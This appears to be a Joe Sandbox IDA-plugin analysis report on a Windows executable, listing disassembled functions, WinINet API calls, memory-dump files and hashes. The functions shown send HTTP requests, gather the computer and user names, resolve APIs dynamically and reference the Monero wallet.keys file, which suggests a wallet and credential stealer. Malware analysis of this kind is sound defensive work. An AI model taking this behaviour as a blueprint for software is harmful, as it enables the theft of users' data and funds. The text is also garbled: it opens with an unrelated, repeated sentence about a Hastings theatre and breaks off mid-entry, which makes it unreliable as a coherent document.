Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 2d375cca564b86ac61bacd50f316ad7c880283f8731c9f582d211a462d434f9b
                                • Instruction ID: 68faca59fd0cba82159aa90d5fbdd6538fdb69eb73e0ed414f592e347349344c
                                • Opcode Fuzzy Hash: 2d375cca564b86ac61bacd50f316ad7c880283f8731c9f582d211a462d434f9b
                                • Instruction Fuzzy Hash: 294124216C6634EEEE35BBA88DC6F9D73BADF42748F5050A2AB04126D0CF6065234627
                                Function 00B74880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 801 b74880-b74942 call b8a7a0 call b747b0 call b8a740 * 5 InternetOpenA StrCmpCA 816 b74944 801->816 817 b7494b-b7494f 801->817 816->817 818 b74955-b74acd call b88b60 call b8a920 call b8a8a0 call b8a800 * 2 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a920 call b8a8a0 call b8a800 * 2 InternetConnectA 817->818 819 b74ecb-b74ef3 InternetCloseHandle call b8aad0 call b79ac0 817->819 818->819 905 b74ad3-b74ad7 818->905 829 b74ef5-b74f2d call b8a820 call b8a9b0 call b8a8a0 call b8a800 819->829 830 b74f32-b74fa2 call b88990 * 2 call b8a7a0 call b8a800 * 8 819->830 829->830 906 b74ae5 905->906 907 b74ad9-b74ae3 905->907 908 b74aef-b74b22 HttpOpenRequestA 906->908 907->908 909 b74ebe-b74ec5 InternetCloseHandle 908->909 910 b74b28-b74e28 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a9b0 call b8a8a0 call b8a800 call b8a920 call b8a8a0 call b8a800 call b8a740 call b8a920 * 2 call b8a8a0 call b8a800 * 2 call b8aad0 lstrlen call b8aad0 * 2 lstrlen call b8aad0 HttpSendRequestA 908->910 909->819 1021 b74e32-b74e5c InternetReadFile 910->1021 1022 b74e67-b74eb9 InternetCloseHandle call b8a800 1021->1022 1023 b74e5e-b74e65 1021->1023 1022->909 1023->1022 1024 b74e69-b74ea7 call b8a9b0 call b8a8a0 call b8a800 1023->1024 1024->1021
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B74915
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B7493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B74ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B90DDB,00000000,?,?,00000000,?,",00000000,?,0093E2B0), ref: 00B74DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B74E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B74E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B74E49
                                • InternetCloseHandle.WININET(00000000), ref: 00B74EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00B74EC5
                                • HttpOpenRequestA.WININET(00000000,0093E210,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B74B15
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • InternetCloseHandle.WININET(00000000), ref: 00B74ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: f4ac99773893c1e8af6b0041f290f2e26b881068834dd57c8c3085bbc2bc17bf
                                • Instruction ID: 97987b12f9bd655a8f5437190a413001dbc4d2bc6870774854162c7f1cdffc8b
                                • Opcode Fuzzy Hash: f4ac99773893c1e8af6b0041f290f2e26b881068834dd57c8c3085bbc2bc17bf
                                • Instruction Fuzzy Hash: FA12AC71910118AAEB15FB54DD92FEEB3B8AF14300F5041EAF106725A1EF742F49CB62
                                Function 00B878E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B87910
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87917
                                • GetComputerNameA.KERNEL32(?,00000104), ref: 00B8792F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 8a1493e38ac13df3717b713f208f58f066f8efe8e6d1a18ea9cdbcc7dc799bef
                                • Instruction ID: 8a92566b396194605e19bd00743acfb1b0ffbc073e17733e59b34a92d050a033
                                • Opcode Fuzzy Hash: 8a1493e38ac13df3717b713f208f58f066f8efe8e6d1a18ea9cdbcc7dc799bef
                                • Instruction Fuzzy Hash: 430162B1944204EBC700EF98DD45BAABBF8F704B25F20425AE545E2790D7745940CBA1
                                Function 00B87850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B711B7), ref: 00B87880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B87887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B8789F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 20f1646b416a1b46ecd6059508c16eba99872a9d1c8d5614d05df2e124faa9ee
                                • Instruction ID: 9180bf539becb7a90c8629fddd34cc3e9d068687c1176eb71b02379de82ab89d
                                • Opcode Fuzzy Hash: 20f1646b416a1b46ecd6059508c16eba99872a9d1c8d5614d05df2e124faa9ee
                                • Instruction Fuzzy Hash: F0F04FB1944208EBC700DF99DD49FAEBBB8EB04711F10025AFA05E2790C7745904CBA1
                                Function 00B71160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 748be3b57adbdaf214d68d449800a4bfc95d1d1f9be1be77f30113fd14a0da91
                                • Instruction ID: 2fde0a4b55fd49acd9a6602a609e1d19a31351bfe9f587b53667e221f08e47c3
                                • Opcode Fuzzy Hash: 748be3b57adbdaf214d68d449800a4bfc95d1d1f9be1be77f30113fd14a0da91
                                • Instruction Fuzzy Hash: CBD05E74D0430CDBCB00DFE8D8496DDBBB8FB08321F000694D905B2340EA315481CAB6
                                Function 00B89C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 633 b89c10-b89c1a 634 b89c20-b8a031 GetProcAddress * 43 633->634 635 b8a036-b8a0ca LoadLibraryA * 8 633->635 634->635 636 b8a0cc-b8a141 GetProcAddress * 5 635->636 637 b8a146-b8a14d 635->637 636->637 638 b8a153-b8a211 GetProcAddress * 8 637->638 639 b8a216-b8a21d 637->639 638->639 640 b8a298-b8a29f 639->640 641 b8a21f-b8a293 GetProcAddress * 5 639->641 642 b8a2a5-b8a332 GetProcAddress * 6 640->642 643 b8a337-b8a33e 640->643 641->640 642->643 644 b8a41f-b8a426 643->644 645 b8a344-b8a41a GetProcAddress * 9 643->645 646 b8a428-b8a49d GetProcAddress * 5 644->646 647 b8a4a2-b8a4a9 644->647 645->644 646->647 648 b8a4ab-b8a4d7 GetProcAddress * 2 647->648 649 b8a4dc-b8a4e3 647->649 648->649 650 b8a515-b8a51c 649->650 651 b8a4e5-b8a510 GetProcAddress * 2 649->651 652 b8a612-b8a619 650->652 653 b8a522-b8a60d GetProcAddress * 10 650->653 651->650 654 b8a61b-b8a678 GetProcAddress * 4 652->654 655 b8a67d-b8a684 652->655 653->652 654->655 656 b8a69e-b8a6a5 655->656 657 b8a686-b8a699 GetProcAddress 655->657 658 b8a708-b8a709 656->658 659 b8a6a7-b8a703 GetProcAddress * 4 656->659 657->656 659->658
                                APIs
                                • GetProcAddress.KERNEL32(75550000,00926320), ref: 00B89C2D
                                • GetProcAddress.KERNEL32(75550000,00926420), ref: 00B89C45
                                • GetProcAddress.KERNEL32(75550000,00938F88), ref: 00B89C5E
                                • GetProcAddress.KERNEL32(75550000,00938FA0), ref: 00B89C76
                                • GetProcAddress.KERNEL32(75550000,0093C898), ref: 00B89C8E
                                • GetProcAddress.KERNEL32(75550000,0093C9A0), ref: 00B89CA7
                                • GetProcAddress.KERNEL32(75550000,0092B3D8), ref: 00B89CBF
                                • GetProcAddress.KERNEL32(75550000,0093C988), ref: 00B89CD7
                                • GetProcAddress.KERNEL32(75550000,0093C8E0), ref: 00B89CF0
                                • GetProcAddress.KERNEL32(75550000,0093CA18), ref: 00B89D08
                                • GetProcAddress.KERNEL32(75550000,0093CA30), ref: 00B89D20
                                • GetProcAddress.KERNEL32(75550000,00926360), ref: 00B89D39
                                • GetProcAddress.KERNEL32(75550000,00926400), ref: 00B89D51
                                • GetProcAddress.KERNEL32(75550000,00926380), ref: 00B89D69
                                • GetProcAddress.KERNEL32(75550000,009263A0), ref: 00B89D82
                                • GetProcAddress.KERNEL32(75550000,0093CA48), ref: 00B89D9A
                                • GetProcAddress.KERNEL32(75550000,0093C8C8), ref: 00B89DB2
                                • GetProcAddress.KERNEL32(75550000,0092B450), ref: 00B89DCB
                                • GetProcAddress.KERNEL32(75550000,009265A0), ref: 00B89DE3
                                • GetProcAddress.KERNEL32(75550000,0093C910), ref: 00B89DFB
                                • GetProcAddress.KERNEL32(75550000,0093C838), ref: 00B89E14
                                • GetProcAddress.KERNEL32(75550000,0093C8F8), ref: 00B89E2C
                                • GetProcAddress.KERNEL32(75550000,0093CAA8), ref: 00B89E44
                                • GetProcAddress.KERNEL32(75550000,00926440), ref: 00B89E5D
                                • GetProcAddress.KERNEL32(75550000,0093C8B0), ref: 00B89E75
                                • GetProcAddress.KERNEL32(75550000,0093C928), ref: 00B89E8D
                                • GetProcAddress.KERNEL32(75550000,0093C940), ref: 00B89EA6
                                • GetProcAddress.KERNEL32(75550000,0093C958), ref: 00B89EBE
                                • GetProcAddress.KERNEL32(75550000,0093C970), ref: 00B89ED6
                                • GetProcAddress.KERNEL32(75550000,0093C9B8), ref: 00B89EEF
                                • GetProcAddress.KERNEL32(75550000,0093C9D0), ref: 00B89F07
                                • GetProcAddress.KERNEL32(75550000,0093CAC0), ref: 00B89F1F
                                • GetProcAddress.KERNEL32(75550000,0093C820), ref: 00B89F38
                                • GetProcAddress.KERNEL32(75550000,00939F48), ref: 00B89F50
                                • GetProcAddress.KERNEL32(75550000,0093C850), ref: 00B89F68
                                • GetProcAddress.KERNEL32(75550000,0093CA60), ref: 00B89F81
                                • GetProcAddress.KERNEL32(75550000,00926480), ref: 00B89F99
                                • GetProcAddress.KERNEL32(75550000,0093C9E8), ref: 00B89FB1
                                • GetProcAddress.KERNEL32(75550000,00926460), ref: 00B89FCA
                                • GetProcAddress.KERNEL32(75550000,0093CA00), ref: 00B89FE2
                                • GetProcAddress.KERNEL32(75550000,0093CA78), ref: 00B89FFA
                                • GetProcAddress.KERNEL32(75550000,00926500), ref: 00B8A013
                                • GetProcAddress.KERNEL32(75550000,00926520), ref: 00B8A02B
                                • LoadLibraryA.KERNEL32(0093CA90,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A03D
                                • LoadLibraryA.KERNEL32(0093CAD8,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A04E
                                • LoadLibraryA.KERNEL32(0093C7F0,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A060
                                • LoadLibraryA.KERNEL32(0093C808,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A072
                                • LoadLibraryA.KERNEL32(0093C868,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A083
                                • LoadLibraryA.KERNEL32(0093C880,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A095
                                • LoadLibraryA.KERNEL32(0093CD18,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A0A7
                                • LoadLibraryA.KERNEL32(0093CB98,?,00B85CA3,00B90AEB,?,?,?,?,?,?,?,?,?,?,00B90AEA,00B90AE3), ref: 00B8A0B8
                                • GetProcAddress.KERNEL32(75750000,00926860), ref: 00B8A0DA
                                • GetProcAddress.KERNEL32(75750000,0093CDD8), ref: 00B8A0F2
                                • GetProcAddress.KERNEL32(75750000,009388B0), ref: 00B8A10A
                                • GetProcAddress.KERNEL32(75750000,0093CB50), ref: 00B8A123
                                • GetProcAddress.KERNEL32(75750000,009268E0), ref: 00B8A13B
                                • GetProcAddress.KERNEL32(73AA0000,0092AF00), ref: 00B8A160
                                • GetProcAddress.KERNEL32(73AA0000,009268A0), ref: 00B8A179
                                • GetProcAddress.KERNEL32(73AA0000,0092B338), ref: 00B8A191
                                • GetProcAddress.KERNEL32(73AA0000,0093CB20), ref: 00B8A1A9
                                • GetProcAddress.KERNEL32(73AA0000,0093CBB0), ref: 00B8A1C2
                                • GetProcAddress.KERNEL32(73AA0000,009267C0), ref: 00B8A1DA
                                • GetProcAddress.KERNEL32(73AA0000,00926920), ref: 00B8A1F2
                                • GetProcAddress.KERNEL32(73AA0000,0093CBC8), ref: 00B8A20B
                                • GetProcAddress.KERNEL32(757E0000,009267E0), ref: 00B8A22C
                                • GetProcAddress.KERNEL32(757E0000,009268C0), ref: 00B8A244
                                • GetProcAddress.KERNEL32(757E0000,0093CB38), ref: 00B8A25D
                                • GetProcAddress.KERNEL32(757E0000,0093CD30), ref: 00B8A275
                                • GetProcAddress.KERNEL32(757E0000,00926900), ref: 00B8A28D
                                • GetProcAddress.KERNEL32(758D0000,0092B068), ref: 00B8A2B3
                                • GetProcAddress.KERNEL32(758D0000,0092AFA0), ref: 00B8A2CB
                                • GetProcAddress.KERNEL32(758D0000,0093CD60), ref: 00B8A2E3
                                • GetProcAddress.KERNEL32(758D0000,00926800), ref: 00B8A2FC
                                • GetProcAddress.KERNEL32(758D0000,00926940), ref: 00B8A314
                                • GetProcAddress.KERNEL32(758D0000,0092B090), ref: 00B8A32C
                                • GetProcAddress.KERNEL32(76BE0000,0093CB08), ref: 00B8A352
                                • GetProcAddress.KERNEL32(76BE0000,009269C0), ref: 00B8A36A
                                • GetProcAddress.KERNEL32(76BE0000,00938800), ref: 00B8A382
                                • GetProcAddress.KERNEL32(76BE0000,0093CDA8), ref: 00B8A39B
                                • GetProcAddress.KERNEL32(76BE0000,0093CAF0), ref: 00B8A3B3
                                • GetProcAddress.KERNEL32(76BE0000,00926960), ref: 00B8A3CB
                                • GetProcAddress.KERNEL32(76BE0000,00926980), ref: 00B8A3E4
                                • GetProcAddress.KERNEL32(76BE0000,0093CCD0), ref: 00B8A3FC
                                • GetProcAddress.KERNEL32(76BE0000,0093CB68), ref: 00B8A414
                                • GetProcAddress.KERNEL32(75670000,00926680), ref: 00B8A436
                                • GetProcAddress.KERNEL32(75670000,0093CDC0), ref: 00B8A44E
                                • GetProcAddress.KERNEL32(75670000,0093CC88), ref: 00B8A466
                                • GetProcAddress.KERNEL32(75670000,0093CC28), ref: 00B8A47F
                                • GetProcAddress.KERNEL32(75670000,0093CD00), ref: 00B8A497
                                • GetProcAddress.KERNEL32(759D0000,009269A0), ref: 00B8A4B8
                                • GetProcAddress.KERNEL32(759D0000,009266C0), ref: 00B8A4D1
                                • GetProcAddress.KERNEL32(76D80000,009269E0), ref: 00B8A4F2
                                • GetProcAddress.KERNEL32(76D80000,0093CCE8), ref: 00B8A50A
                                • GetProcAddress.KERNEL32(6FAA0000,00926A00), ref: 00B8A530
                                • GetProcAddress.KERNEL32(6FAA0000,009266E0), ref: 00B8A548
                                • GetProcAddress.KERNEL32(6FAA0000,00926700), ref: 00B8A560
                                • GetProcAddress.KERNEL32(6FAA0000,0093CB80), ref: 00B8A579
                                • GetProcAddress.KERNEL32(6FAA0000,00926A20), ref: 00B8A591
                                • GetProcAddress.KERNEL32(6FAA0000,00926840), ref: 00B8A5A9
                                • GetProcAddress.KERNEL32(6FAA0000,009266A0), ref: 00B8A5C2
                                • GetProcAddress.KERNEL32(6FAA0000,00926740), ref: 00B8A5DA
                                • GetProcAddress.KERNEL32(6FAA0000,InternetSetOptionA), ref: 00B8A5F1
                                • GetProcAddress.KERNEL32(6FAA0000,HttpQueryInfoA), ref: 00B8A607
                                • GetProcAddress.KERNEL32(75480000,0093CD48), ref: 00B8A629
                                • GetProcAddress.KERNEL32(75480000,00938920), ref: 00B8A641
                                • GetProcAddress.KERNEL32(75480000,0093CC10), ref: 00B8A659
                                • GetProcAddress.KERNEL32(75480000,0093CD78), ref: 00B8A672
                                • GetProcAddress.KERNEL32(753B0000,009267A0), ref: 00B8A693
                                • GetProcAddress.KERNEL32(6FA30000,0093CBE0), ref: 00B8A6B4
                                • GetProcAddress.KERNEL32(6FA30000,00926720), ref: 00B8A6CD
                                • GetProcAddress.KERNEL32(6FA30000,0093CCB8), ref: 00B8A6E5
                                • GetProcAddress.KERNEL32(6FA30000,0093CBF8), ref: 00B8A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 5f868670439fd0ae952cd20429a8de4a8696ed900aba458f51842ad5bbe5c7da
                                • Instruction ID: a474a3158f3ad0a8b8af5147a5f337d2ab80c56696c77804d7356ed657293f88
                                • Opcode Fuzzy Hash: 5f868670439fd0ae952cd20429a8de4a8696ed900aba458f51842ad5bbe5c7da
                                • Instruction Fuzzy Hash: A4622BB9508300EFC354DFADED889663BF9F74C701764871AA609C3764DA3A9842DB72
                                Function 00B76280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
